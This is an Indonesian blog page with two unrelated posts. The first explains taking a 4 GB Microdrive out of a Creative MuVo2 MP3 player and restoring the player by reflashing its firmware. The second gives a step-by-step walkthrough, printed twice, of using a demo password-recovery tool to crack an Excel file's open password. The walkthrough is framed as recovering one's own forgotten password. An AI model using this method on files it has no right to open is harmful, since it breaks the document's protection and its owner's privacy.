Tertarik dengan informasi mengenai bagaimana mendapatkan kartu memori berkapasitas 4 GB dengan harga “hanya” sekitar 3 juta Rupiah saja?
Beberapa waktu lalu di dunia Internet sempat ramai dengan penemuan trik mendapatkan kartu memori digital secara murah. Ada satu produk pemutar MP3 dengan merk/tipe Creative Nomad MuVo2 4.0GB dengan kapasitas memori 4 GB
cukup untuk menampung sekitar 1000 file audio berformat MP3. Di pasaran barang ini dijual dengan harga sekitar $350 atau sekitar 3 juta Rupiah. Lalu apa yang membuat produk ini sempat laris bak kacang goreng di Amerika dan Eropa?
Berdasar penemuan Andy Mack
di dalam produk ini terdapat kartu memori Microdrive (MD) merk Hitachi berkapasitas 4 GB. Dengan membuka kotak produk ini (tentunya garansi yang anda dapatkan dari produk ini akan hangus)
kartu memori tersebut dapat dilepas dengan cukup mudah. Kartu ini kemudian dapat di-format ulang untuk digunakan di perangkat lain seperti kamera digital dan PDA
tentunya yang mendukung kartu memori Microdrive. Dengan demikian anda dapat menghemat sekitar 4-5 juta Rupiah untuk sebuah kartu memori berkapasitas 4 GB! Sebuah investasi yang sangat menguntungkan!
Sekarang anda telah mengetahui trik untuk memperoleh kartu memori dengan harga murah
lalu bagaimana memfungsikan kembali pemutar MP3 yang telah anda bongkar tersebut?
Keterangan: Baca artikel sebelumnya tentang cara mendapatkan kartu memori murah.
Jangan kuatir
anda cukup membeli kartu memori Microdrive dengan kapasitas kecil (misal 128 MB dengan harga pasaran sekitar 200-250 ribu Rupiah) untuk mengganti kartu memori yang telah dilepas. Ikuti langkah-langkah berikut tentang bagaimana mengganti dan memfungsikan kembali pemutar MP3 tersebut:
1. Download firmware pemutar MP3 dari situs http://asia.creative.com/support/drivers atau langsung download dari link ini (direkomendasikan).
Catatan: Pada saat artikel dibuat
firmware terbaru yang ada pada situs adalah versi 1.11.01 sedangkan percobaan dilakukan dengan menggunakan firmware versi 1.10.01. Disarankan untuk mendownload lewat link yang direkomendasikan. Jika link tersebut sudah tidak valid
anda bisa mencoba menggunakan firmware versi 1.11.01 atau lebih baru.
2. Pasang kartu memori pengganti ke dalam kotak pemutar MP3
ke tempat asal kartu memori 4 GB dilepas sebelumnya. Tutup kembali kotak pemutar MP3 tersebut.
3. Pada saat dihidupkan
akan tertera pesan “Recovery Mode v1.00? di layar.
4. Pilih opsi ketiga yaitu “Format All” untuk mem-format kartu memori pengganti yang baru dipasang.
5. Setelah proses format selesai
akan muncul pesan “Media Error” di layar.
6.Pilih opsi untuk memperbaharui/update firmware
7.Muncul pesan “Attach USB cable
Start FW upgrade”. Hubungkan kabel USB yang disertakan dengan pemutar MP3 ke PC.
8.Jalankan file firmware yang telah di-download sebelumnya. Akan muncul window “Creative MuVo^2 4GB Firmware Upgrade”. Tekan tombol “Upgrade” untuk memulai proses pembaharuan/upgrade firmware.
9. Pemutar MP3 tersebut dapat digunakan kembali!
Catatan: Ada beberapa merk/tipe kartu memori Microdrive yang belum berhasil dijadikan kartu memori pengganti. Lihat informasi lebih lanjut pada alamat di bawah.
Sumber informasi dan gambar:
© Andy Mack (http://www.andymack.com/mylog/pivot/entry.php?uid=standard-881)
MEMBOBOL PASSWORD EXCEL
Manfaatkan software pencari password untuk membuka dokumen yang terkunci.
Lindungi dokumen Excel Anda dengan mengeset password untuk membukanya.
Tapi, bagaimana jika Anda sendiri lupa password yang sudah Anda buat?
Dengan bantuan software Excel Password, perkara ini bisa diatasi.
Pada versi demonya, software ini hanya mampu membobol password maksimal 3 digit kode. OKKY
LANGKAH 1
Buka situs www.lastbit.com.
Klik opsi [Excel Password] yang ada di bawah list “Password recovery”.
LANGKAH 2
Klik opsi [Download] di sebelah kanan halaman.
Pada situs ini, Anda hanya bisa men-download versi demonya, yang berkapasitas 632 KB.
Simpan file berformat ZIP tersebut ke dalam hard disk.
LANGKAH 3
Bongkar file excelpswdemo.zip yang baru saja Anda download. Klik-dobel file Setup.exe untuk memulai pemasangan. Pada boks dialog yang muncul, klik tombol [Yes], dan lanjutkan proses penginstalan hingga selesai.
LANGKAH 4
Bukalah dokumen Excel yang belum terproteksi password. Simpan kembali dokumen tersebut dengan mengeklik menu [File] [Save As…]. Pada jendela Save As, klik menu [Tools] [General Options…].
LANGKAH 5
Karena versi demo Excel Password berkemampuan terbatas, sebaiknya masukkan password maksimal 3 digit. Pada jendela Save Options, Ketik password untuk membuka dokumen tersebut pada kotak “Password to open:”.
Klik [OK]. Masukkan password sekali lagi, lalu klik [OK].
LANGKAH 6
Untuk menjajal keampuhan software ini, jalankan Excel Password melalui menu [Start] [All Programs] [PasswordTools] [Excel Password].
LANGKAH 7
Lanjutkan dengan mengeklik tombol [Open] bersimbol anak kunci.
LANGKAH 8
Sorot file Excel yang barusan Anda lengkapi dengan password. Klik [Open], lalu klik tombol [Continue] pada jendela yang muncul.
LANGKAH 9
Saat muncul jendela Select recovery mode, klik opsi [Automatic] [Next >>].
LANGKAH 10
Tunggu beberapa waktu hingga Excel Password mendeteksi password pada dokumen tersebut.
LANGKAH 11
Lihat, Excel Password memberitahukan password dokumen itu. Klik tombol [Yes] untuk langsung membuka dokumen
this posting is ref.from Weblog kuliah online ilmu komputer “
thank my friend blogger..
Lindungi dokumen Excel Anda dengan mengeset password untuk membukanya.
Tapi, bagaimana jika Anda sendiri lupa password yang sudah Anda buat?
Dengan bantuan software Excel Password, perkara ini bisa diatasi.
Pada versi demonya, software ini hanya mampu membobol password maksimal 3 digit kode. OKKY
LANGKAH 1
Buka situs www.lastbit.com.
Klik opsi [Excel Password] yang ada di bawah list “Password recovery”.
LANGKAH 2
Klik opsi [Download] di sebelah kanan halaman.
Pada situs ini, Anda hanya bisa men-download versi demonya, yang berkapasitas 632 KB.
Simpan file berformat ZIP tersebut ke dalam hard disk.
LANGKAH 3
Bongkar file excelpswdemo.zip yang baru saja Anda download. Klik-dobel file Setup.exe untuk memulai pemasangan. Pada boks dialog yang muncul, klik tombol [Yes], dan lanjutkan proses penginstalan hingga selesai.
LANGKAH 4
Bukalah dokumen Excel yang belum terproteksi password. Simpan kembali dokumen tersebut dengan mengeklik menu [File] [Save As…]. Pada jendela Save As, klik menu [Tools] [General Options…].
LANGKAH 5
Karena versi demo Excel Password berkemampuan terbatas, sebaiknya masukkan password maksimal 3 digit. Pada jendela Save Options, Ketik password untuk membuka dokumen tersebut pada kotak “Password to open:”.
Klik [OK]. Masukkan password sekali lagi, lalu klik [OK].
LANGKAH 6
Untuk menjajal keampuhan software ini, jalankan Excel Password melalui menu [Start] [All Programs] [PasswordTools] [Excel Password].
LANGKAH 7
Lanjutkan dengan mengeklik tombol [Open] bersimbol anak kunci.
LANGKAH 8
Sorot file Excel yang barusan Anda lengkapi dengan password. Klik [Open], lalu klik tombol [Continue] pada jendela yang muncul.
LANGKAH 9
Saat muncul jendela Select recovery mode, klik opsi [Automatic] [Next >>].
LANGKAH 10
Tunggu beberapa waktu hingga Excel Password mendeteksi password pada dokumen tersebut.
LANGKAH 11
Lihat, Excel Password memberitahukan password dokumen itu. Klik tombol [Yes] untuk langsung membuka dokumen
this posting is ref.from Weblog kuliah online ilmu komputer “
thank my friend blogger..
Langganan:
Postingan (Atom)